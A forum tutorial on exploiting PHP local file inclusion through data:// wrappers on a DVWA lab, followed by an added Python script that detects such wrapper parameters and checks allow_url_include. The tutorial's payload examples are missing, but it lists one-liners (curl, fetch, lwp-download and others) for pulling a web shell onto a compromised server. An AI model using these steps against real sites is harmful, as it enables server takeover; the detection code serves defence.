Using Data wrappers in LFi

Omega

Hello guys, LFIs can be exploited by php://input, php://filter, including sensitive files and so many other techniques. So I thought of writing a small tutorial on exploiting LFI using data:// wrappers.

The data URIs are used in web development to load images and other elements in a single HTTP request rather than using multiple HTTP headers. By using data URIs we can perform many attacks including phishing attacks and so many new techniques can be used.

To use data:// wrappers in LFI, these are the conditions:

allow_url_include = On

PHP version should be higher than 5.2

I will demonstrate this attack on DVWA on my localhost. So I will use a simple web shell.




Let's convert this to a URI.




or




I will include this data URI and this is the output:





You can use wget to download a webshell and compromise the server.

Well, other methods that can be used to download a shell are:



curl http://site.com -o out.php

fetch http://site.com -o out.php

links -source http://shell > out.php

GET http://site.com > out.php

lwp-download http://site

To generate your own custom data URI payload use this site http://dopiaza.org/t...tauri/index.php

Thank you for reading this, hope you got something.

-Un0wn_X
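
A defender's check for the two things this post relies on, as an added example that is not part of the original post: it flags request parameters whose value starts with a data: or php:// wrapper (after undoing repeated percent-encoding) and reports whether a php.ini text turns allow_url_include on. The `/index.php` path, the `page` parameter and all sample inputs are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Wrappers named in the post, matched at the start of a parameter value.
WRAPPER_RE = re.compile(r"\s*(data:|php://(?:input|filter))", re.IGNORECASE)
INI_RE = re.compile(r"allow_url_include\s*=\s*(\S+)", re.IGNORECASE)

def decode_fully(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def wrapper_params(request_target):
    """Return [(param, wrapper)] for query values that start with a wrapper."""
    hits = []
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        m = WRAPPER_RE.match(decode_fully(value))
        if m:
            hits.append((name, m.group(1).lower()))
    return hits

def url_include_enabled(ini_text):
    """True if the last allow_url_include line in php.ini text turns it on."""
    enabled = False  # PHP ships with allow_url_include = Off
    for line in ini_text.splitlines():
        m = INI_RE.match(line.split(";", 1)[0].strip())
        if m:
            enabled = m.group(1).strip('"').lower() in ("1", "on", "true", "yes")
    return enabled

# Constructed request targets; /index.php and "page" are assumed names.
SAMPLE_TARGETS = [
    "/index.php?page=include.php",
    "/index.php?page=data:text/plain,hello",
    "/index.php?page=%2564ata%253Atext/plain,hello",  # double-encoded
    "/index.php?id=1&page=PHP://input",
]

if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        print(target, wrapper_params(target))
    print(url_include_enabled("allow_url_include = On ; constructed sample"))
```

Keeping allow_url_include = Off and resolving the include parameter against a fixed allowlist of files removes the first condition the post lists.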
